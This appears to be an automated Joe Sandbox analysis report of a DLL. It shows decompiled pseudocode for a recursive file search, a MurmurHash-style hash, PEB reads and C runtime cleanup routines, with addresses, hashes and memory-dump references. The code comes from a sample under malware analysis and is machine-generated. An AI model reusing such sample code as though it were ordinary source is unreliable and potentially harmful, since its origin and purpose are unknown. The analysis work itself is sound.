0x6e9e9742
0x6e9e9745
0x6e9e9747
0x6e9e974a
0x6e9e974d
0x6e9e9750
0x6e9e9753
0x6e9e975c
0x6e9e9761
0x6e9e9761
0x6e9e975c
0x6e9e976c
0x6e9e9771
0x6e9e9774
0x6e9e977e
0x6e9e9789
0x6e9e978f
0x6e9e9792
0x6e9e979c
0x6e9e97a7
0x6e9e97b3
0x6e9e97b6
0x6e9e97b9
0x6e9e97c4
0x6e9e97c9
0x6e9e97cb
0x6e9e97d0
0x6e9e97d3
0x6e9e97dd
0x6e9e97e5
0x6e9e97ea
0x6e9e97f4
0x6e9e9802
0x6e9e9815
0x6e9e981c
0x6e9e981c
0x6e9e9802
0x6e9e97e5
0x6e9e97c9
0x6e9e97a7
0x00000000
0x6e9e9824
0x6e9e96e6
0x6e9e96f0
0x6e9e9715
0x6e9e971b
0x6e9e971e
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E9E966E

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 5e89ef757747ddb97d5717dcf390b595cf8c54da9f5e08eaaf2618cb1a40692d
Instruction ID: f510cd8d4c1f07cf4c806ea8436c2741e84a76b272c6735d47bb0411187e06c9
Opcode Fuzzy Hash: 5e89ef757747ddb97d5717dcf390b595cf8c54da9f5e08eaaf2618cb1a40692d
Instruction Fuzzy Hash: CE5198B1A246068BEB1ACF95E4817AEBBF4FF49304F1485AAC526EB340D375D940CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EED8A Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E9EED8A(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t2 = _t133 + 1; // 0x1
				_t155 = _t2;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t5 = _t158 + 1; // 0x1
					_t126 = _t5 + _t135;
					_t165 = E6E9EDC48(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E6E9F2161(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E6E9EF185(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E6E9EDC0E(_t165);
								_t167 = _v8;
							}
							E6E9EDC0E(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E6E9F2161(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E6E9EC27C();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0x6e9fc024; // 0xd7674204
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E6E9F21B0(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E6E9EEB7E(_t138 - _t160 + 1, _t160,  &_v672, E6E9EF092(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t143;
									_t144 = _t143 >> 2;
									_v644 = _t143 >> 2;
									do {
										_v636 = _t127;
										_v632 = _t127;
										_v628 = _t127;
										_v624 = _t127;
										_v620 = _t127;
										_v616 = _t127;
										_t94 = E6E9EEAAF( &(_v604.cFileName),  &_v636,  &_v605, E6E9EF092(_t156, __eflags));
										_t174 = _t174 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E6E9EED8A(_t144, _t166, _t97, _t160, _v640);
											_t174 = _t174 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t127;
												if(_v616 != _t127) {
													E6E9EDC0E(_v628);
													_t98 = _v648;
												}
												_t127 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t144 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t144;
											if(_t144 == 0) {
												goto L35;
											} else {
												__eflags = _t144 - 0x2e;
												if(_t144 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t127;
										if(_v616 != _t127) {
											E6E9EDC0E(_v628);
											_pop(_t144);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t149 = _v644;
									_t156 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t149 - _t109;
									if(_t149 != _t109) {
										E6E9F1BC0(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E6E9EE9E5);
									}
									goto L43;
								} else {
									_push(_v612);
									_t127 = E6E9EED8A( &_v604, _t166, _t160, _t127, _t127);
								}
								L44:
								__eflags = _v652;
								_pop(_t165);
								if(_v652 != 0) {
									E6E9EDC0E(_v664);
								}
								_t100 = _t127;
							} else {
								__eflags = _t138 - _t160 + 1;
								if(_t138 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t156);
									_t100 = E6E9EED8A(_t138, _t165, _t160, 0, 0);
								}
							}
							_pop(_t161);
							__eflags = _v12 ^ _t170;
							_pop(_t128);
							return E6E9E9ADF(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
						} else {
							goto L7;
						}
					}
				} else {
					_t121 = 0xc;
					L4:
					return _t121;
				}
			}

0x6e9eed8f
0x6e9eed90
0x6e9eed93
0x6e9eed93
0x6e9eed96
0x6e9eed96
0x6e9eed98
0x6e9eed99
0x6e9eed9e
0x6e9eeda5
0x6e9eeda8
0x6e9eedad
0x6e9eedb6
0x6e9eedb7
0x6e9eedba
0x6e9eedc4
0x6e9eedc8
0x6e9eedca
0x6e9eedde
0x6e9eedde
0x6e9eede1
0x6e9eedeb
0x6e9eedf0
0x6e9eedf3
0x6e9eedf5
0x00000000
0x6e9eedf7
0x6e9eedf7
0x6e9eedfc
0x6e9eee03
0x6e9eee06
0x6e9eee08
0x6e9eee19
0x6e9eee1b
0x6e9eee1d
0x6e9eee1d
0x6e9eee1d
0x6e9eee0a
0x6e9eee0b
0x6e9eee10
0x6e9eee13
0x6e9eee22
0x6e9eee28
0x00000000
0x6e9eee2b
0x6e9eedcc
0x6e9eedcc
0x6e9eedd2
0x6e9eedd7
0x6e9eedda
0x6e9eeddc
0x6e9eee2e
0x6e9eee30
0x6e9eee31
0x6e9eee32
0x6e9eee33
0x6e9eee34
0x6e9eee35
0x6e9eee3a
0x6e9eee3e
0x6e9eee40
0x6e9eee46
0x6e9eee4d
0x6e9eee50
0x6e9eee53
0x6e9eee56
0x6e9eee57
0x6e9eee58
0x6e9eee5b
0x6e9eee61
0x6e9eee63
0x6e9eee65
0x6e9eee65
0x6e9eee67
0x6e9eee69
0x00000000
0x00000000
0x6e9eee6b
0x6e9eee6d
0x6e9eee6f
0x6e9eee71
0x6e9eee7c
0x6e9eee7e
0x6e9eee80
0x00000000
0x00000000
0x6e9eee80
0x6e9eee71
0x00000000
0x6e9eee6d
0x6e9eee82
0x6e9eee82
0x6e9eee88
0x6e9eee8a
0x6e9eee90
0x6e9eee92
0x6e9eeeb4
0x6e9eeeb4
0x6e9eeeb6
0x6e9eeeb8
0x6e9eeec4
0x6e9eeec4
0x6e9eeeba
0x6e9eeeba
0x6e9eeebc
0x00000000
0x6e9eeebe
0x6e9eeebe
0x6e9eeec0
0x6e9eeec2
0x00000000
0x00000000
0x6e9eeec2
0x6e9eeebc
0x6e9eeecc
0x6e9eeed4
0x6e9eeeda
0x6e9eeedb
0x6e9eeedd
0x6e9eeee5
0x6e9eeeeb
0x6e9eeef1
0x6e9eeef7
0x6e9eef0b
0x6e9eef10
0x6e9eef1b
0x6e9eef31
0x6e9eef33
0x6e9eef36
0x6e9eef59
0x6e9eef59
0x6e9eef5b
0x6e9eef5e
0x6e9eef64
0x6e9eef64
0x6e9eef6a
0x6e9eef70
0x6e9eef76
0x6e9eef7c
0x6e9eef82
0x6e9eefa3
0x6e9eefa8
0x6e9eefad
0x6e9eefb1
0x6e9eefb7
0x6e9eefba
0x6e9eefcd
0x6e9eefcd
0x6e9eefdb
0x6e9eefe0
0x6e9eefe3
0x6e9eefe9
0x6e9eefeb
0x6e9ef049
0x6e9ef04f
0x6e9ef057
0x6e9ef05c
0x6e9ef062
0x6e9ef063
0x00000000
0x00000000
0x00000000
0x6e9eefbc
0x6e9eefbc
0x6e9eefbf
0x6e9eefc1
0x00000000
0x6e9eefc3
0x6e9eefc3
0x6e9eefc6
0x00000000
0x6e9eefc8
0x6e9eefc8
0x6e9eefcb
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eefcb
0x6e9eefc6
0x6e9eefc1
0x6e9ef065
0x6e9ef066
0x00000000
0x6e9eefed
0x6e9eefed
0x6e9eeff3
0x6e9eeffb
0x6e9ef000
0x6e9ef000
0x6e9ef00f
0x6e9ef00f
0x6e9ef017
0x6e9ef01d
0x6e9ef023
0x6e9ef02a
0x6e9ef02d
0x6e9ef02f
0x6e9ef03f
0x6e9ef044
0x00000000
0x6e9eef38
0x6e9eef38
0x6e9eef49
0x6e9eef49
0x6e9ef06c
0x6e9ef06c
0x6e9ef073
0x6e9ef074
0x6e9ef07c
0x6e9ef081
0x6e9ef082
0x6e9eee94
0x6e9eee97
0x6e9eee99
0x6e9eeeae
0x00000000
0x6e9eee9b
0x6e9eee9b
0x6e9eeea1
0x6e9eeea6
0x6e9eee99
0x6e9ef087
0x6e9ef088
0x6e9ef08a
0x6e9ef091
0x00000000
0x00000000
0x00000000
0x6e9eeddc
0x6e9eedaf
0x6e9eedb1
0x6e9eedb2
0x6e9eedb4
0x6e9eedb4

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87635bd228e0d5d0f6041a31450a79ad8cf1f669e9806e15bf7f368ba9ce3e63
Instruction ID: 6837f79aadd4006e297e83a43faa0ff2430ebda3b163d3316208abb56a09e16b
Opcode Fuzzy Hash: 87635bd228e0d5d0f6041a31450a79ad8cf1f669e9806e15bf7f368ba9ce3e63
Instruction Fuzzy Hash: D14191B5C04219AEDB15CFA9CC88AEABBBDAF85304F1446DDE51DE3200DA31DE848F50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EFE17 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9EFE17() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x6e9fd9d8 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x6e9efe17
0x6e9efe1f
0x6e9efe27

APIs

GetProcessHeap.KERNEL32 ref: 6E9EFE17

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 435e0ad379f7b39f371149c364294953c2d7db2ec8425a394c944e5a3f618309
Instruction ID: 867d6837f88125b85f4e104aec9cec090dc863fc8119897fae785fffb38cbdef
Opcode Fuzzy Hash: 435e0ad379f7b39f371149c364294953c2d7db2ec8425a394c944e5a3f618309
Instruction Fuzzy Hash: 72A001B060AA018B9B508F75A6893093AA9AF466D5719806AA54AC9251EB2488909A41

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E8C90 Relevance: .1, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E9E8C90(signed char* _a4, signed int _a8, unsigned int _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;

				_v32 = 0x5bd1e995;
				_v36 = 0x18;
				_v20 = _a8;
				_v24 = _a4;
				_v8 = _a12;
				while(_a8 >= 4) {
					_v16 =  *_v24;
					_v16 = _v16 * 0x5bd1e995;
					_v16 = _v16 >> 0x00000018 ^ _v16;
					_v16 = _v16 * 0x5bd1e995;
					_v8 = _v8 * 0x5bd1e995;
					_v8 = _v8 ^ _v16;
					_v24 =  &(_v24[4]);
					_a8 = _a8 - 4;
				}
				_v12 = 0;
				_v28 = _a8;
				if(_v28 == 1) {
					L9:
					_v12 =  *_v24 & 0x000000ff ^ _v12;
				} else {
					if(_v28 == 2) {
						L8:
						_v12 = (_v24[1] & 0x000000ff) << 0x00000008 ^ _v12;
						goto L9;
					} else {
						if(_v28 == 3) {
							_v12 = ( *(_v24 + (1 << 1)) & 0x000000ff) << 0x00000010 ^ _v12;
							goto L8;
						} else {
						}
					}
				}
				_v12 = _v12 * 0x5bd1e995;
				_v12 = _v12 >> 0x00000018 ^ _v12;
				_v12 = _v12 * 0x5bd1e995;
				_v8 = _v8 * 0x5bd1e995;
				_v8 = _v8 ^ _v12;
				_v20 = _v20 * 0x5bd1e995;
				_v20 = _v20 >> 0x00000018 ^ _v20;
				_v20 = _v20 * 0x5bd1e995;
				_v8 = _v8 * 0x5bd1e995;
				_v8 = _v8 ^ _v20;
				_v8 = _v8 >> 0x0000000d ^ _v8;
				_v8 = _v8 * 0x5bd1e995;
				_v8 = _v8 >> 0x0000000f ^ _v8;
				return _v8;
			}

0x6e9e8c96
0x6e9e8c9d
0x6e9e8ca7
0x6e9e8cad
0x6e9e8cb3
0x6e9e8cb6
0x6e9e8cc1
0x6e9e8ccb
0x6e9e8cd7
0x6e9e8ce1
0x6e9e8ceb
0x6e9e8cf4
0x6e9e8cfd
0x6e9e8d06
0x6e9e8d06
0x6e9e8d0b
0x6e9e8d15
0x6e9e8d1c
0x6e9e8d5b
0x6e9e8d6d
0x6e9e8d1e
0x6e9e8d22
0x6e9e8d43
0x6e9e8d58
0x00000000
0x6e9e8d24
0x6e9e8d28
0x6e9e8d40
0x00000000
0x00000000
0x6e9e8d2a
0x6e9e8d28
0x6e9e8d22
0x6e9e8d77
0x6e9e8d83
0x6e9e8d8d
0x6e9e8d97
0x6e9e8da0
0x6e9e8daa
0x6e9e8db6
0x6e9e8dc0
0x6e9e8dca
0x6e9e8dd3
0x6e9e8ddf
0x6e9e8de9
0x6e9e8df5
0x6e9e8dfe

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1083b562e57d6fcdb7a0cef3685f2573a546d89591e8eba71522b663db6eeb62
Instruction ID: 56df549dca56209b34109c28b2645b44d3bcda41dd745ec47cbaf65b0c175d79
Opcode Fuzzy Hash: 1083b562e57d6fcdb7a0cef3685f2573a546d89591e8eba71522b663db6eeb62
Instruction Fuzzy Hash: E9519BB0D00219EFCB48CF99D6919AEFBB5EF49300F2085AAD951AB350D734AB41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EE9B4 Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9EE9B4(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E6E9EDE3D(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x6e9ee9c1
0x6e9ee9c3
0x6e9ee9c6
0x6e9ee9c9
0x6e9ee9cc
0x6e9ee9dd
0x6e9ee9df
0x6e9ee9ce
0x6e9ee9d2
0x6e9ee9db
0x00000000
0x00000000
0x6e9ee9db
0x6e9ee9e4

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d29695600689807b11558e5c6e6a4222949c1000ade68193d81d4f01b1a44bb
Instruction ID: d81de2419f0a2210c86039b1835a478a3187b1752e26c290517f223a240a7879
Opcode Fuzzy Hash: 8d29695600689807b11558e5c6e6a4222949c1000ade68193d81d4f01b1a44bb
Instruction Fuzzy Hash: 80E08C33911238EBCB12CBD8C904A8AB3ECEF84A40B1108ABB601D3610C370DE00CFC0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E83B0 Relevance: .0, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9E83B0() {

				return  *((intOrPtr*)( *[fs:0x30] + 0x18));
			}

0x6e9e83bd

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
Instruction ID: 0230c4de2727f5ca7c94c7bd14938b1f1fc6463ea35c1893f292ab52552c7abd
Opcode Fuzzy Hash: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
Instruction Fuzzy Hash: 8CB011322A2B88CBC202CA8CE080E80B3ECE308E20F0000A0E80883B22C228FC00C880

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E1710 Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9E1710() {

				return  *[fs:0x30];
			}

0x6e9e171a

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
Instruction ID: be7eecee3400b42b3e558a840de4aeb97e4223185f45bdd8b65d759b642826a8
Opcode Fuzzy Hash: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
Instruction Fuzzy Hash: 85A002321A5B8CC7C612A68DA651B51B3ECE348D54F440461A50D43E015659B9108495

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F0367 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9F0367(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e9fc708) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E9EDC0E(_t46);
							E6E9F180D( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E9EDC0E(_t47);
							E6E9F190B( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E9EDC0E( *((intOrPtr*)(_t74 + 0x7c)));
						E6E9EDC0E( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E9EDC0E( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E9EDC0E( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E9EDC0E( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E9EDC0E( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E9F04D8( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e9fc1d8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E9EDC0E(_t31);
							E6E9EDC0E( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E9EDC0E(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E9EDC0E(_t74);
			}

0x6e9f036f
0x6e9f0373
0x6e9f037b
0x6e9f0384
0x6e9f0389
0x6e9f0390
0x6e9f0398
0x6e9f03a0
0x6e9f03ab
0x6e9f03b1
0x6e9f03b2
0x6e9f03ba
0x6e9f03c2
0x6e9f03cd
0x6e9f03d3
0x6e9f03d7
0x6e9f03e2
0x6e9f03e8
0x6e9f0389
0x6e9f03e9
0x6e9f03f1
0x6e9f0404
0x6e9f0417
0x6e9f0425
0x6e9f0430
0x6e9f0435
0x6e9f043e
0x6e9f0446
0x6e9f0447
0x6e9f044d
0x6e9f0450
0x6e9f0453
0x6e9f045a
0x6e9f045c
0x6e9f0460
0x6e9f0468
0x6e9f046f
0x6e9f0475
0x6e9f0476
0x6e9f0476
0x6e9f047d
0x6e9f047f
0x6e9f0484
0x6e9f048c
0x6e9f0491
0x6e9f0492
0x6e9f0492
0x6e9f0495
0x6e9f0498
0x6e9f049b
0x6e9f049e
0x6e9f049e
0x6e9f04ae

APIs

___free_lconv_mon.LIBCMT ref: 6E9F03AB

Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F182A
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F183C
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F184E
